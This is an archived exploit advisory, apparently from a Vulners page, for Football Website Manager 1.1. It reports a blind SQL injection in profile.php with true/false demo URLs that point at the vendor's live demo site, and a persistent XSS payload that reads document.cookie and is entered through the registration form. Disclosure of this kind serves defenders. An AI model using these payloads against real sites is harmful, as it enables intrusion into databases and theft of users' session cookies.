Vulners
Lucene search
Football Website Manager 1.1 Cross Site Scripting / SQL Injection
`=========================================================================
Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability
==========================================================================
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
+=+=+= +=+=+=
+=+=+= /\ | | | | ________ _____ _____ __ _ __ +=+=+=
+=+=+= / \ | |__| | _____ / ______/ | _ \ | ____|\ \ / \ / / +=+=+=
+=+=+= / /\ \| |__| | /_____/ | | | |_) / | |__ \ \/ \/ / +=+=+=
+=+=+= / ____ \ | | | | |_______ | __\ \ | __| \ / +=+=+=
+=+=+= /_/ \_\| | | |________/ |_| \_\ | |_______\_____/_____ +=+=+=
+=+=+= |_____________________|+=+=+=
+=+=+= +=+=+=
+=+=+= X-n3t - **RoAd_KiLlEr** - The|Denny` - The_1nv1s1bl3 +=+=+=
+=+=+= +=+=+=
+=+=+= 0ne Nation , 0ne People , 0ne Culture , 0ne Language = Ethnic Albania +=+=+=
+=+=+= +=+=+=
+=+=+= ....::: | ALBANIAN HACKING CREW | :::.... 2011 +=+=+=
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
0 0
1 ########################################### 1
0 I'm **RoAd_KiLlEr** member from 1337 DAY Team 1
1 ########################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+]Title :.......Football Website Manager PHP Script BSQL-i / Persistent XSS Vulnerability
[+]Author :......**RoAd_KiLlEr**
[+]Tested on :...Win Xp Sp 2/3 | Apache 2.0.64 | PHP: 5.3.5
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: sukihack[at]gmail[dot]com
[~] Home: http://1337day.com/author/2447
[~] Vendor: http://www.nil.clan-hosts.net/cycsoftware/index.php
[~] Download CMS:http://www.nil.clan-hosts.net/cycsoftware/modules.php?op=modload&name=Downloads&file=index&req=getit&lid=2
[~] Version: 1.1
[~] License: GNU GPL
==========ExPl0iT3d by **RoAd_KiLlEr**==========
[+] Description:
Football Website Manager is a PHP script that allows you to create a website for a football (soccer) team in order to keep track of team info and league matches. It is menu driven so no HTML or programing knowledge is required.
It allows you to add teams in your division, add players to your squad, assign roles to each member (player, manager etc) add fixtures, then add results for your matches as well as other teams to keep the league table up to date.
You can also post news stories to the main page, assign rights to other players to post news or give them full access.
========================================
[ I ]. BSQL-i Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[P0C]: http://127.0.0.1/profile.php?fileId=[BLIND SQL INJECTION]
[L!v3 D3m0]:
http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=-113 <== FALSE :P
http://www.nil.clan-hosts.net/fbdemo/profile.php?fileId=113 <== TRUE :D
[ II ]. Persistent XSS Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Persitent XSS egzists in the members area.
First go to any site,than click register http://127.0.0.1/register.php
In the area of your Username and Full Name write the javascript :D..
[At4ck Patt3rn]: "><script>alert(document.cookie)</script>
Than when you go to view your profile the script executes.
[+] TIME TABLE:
26 April 2011 - Vulnerability discovered.
26 April 2011 - Vendor Notified.
27 April 2011 - Advisory released.
===========================================================================================
[!] Albanian Hacking Crew
===========================================================================================
[!] **RoAd_KiLlEr**
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | THE_1NV1S1BL3 | KHG & All Albanian/Kosova Hackers
===========================================================================================
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects | DoNnY | All 1337day Members | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Apr 2011 00:00Current
0.4Low risk
Vulners AI Score0.4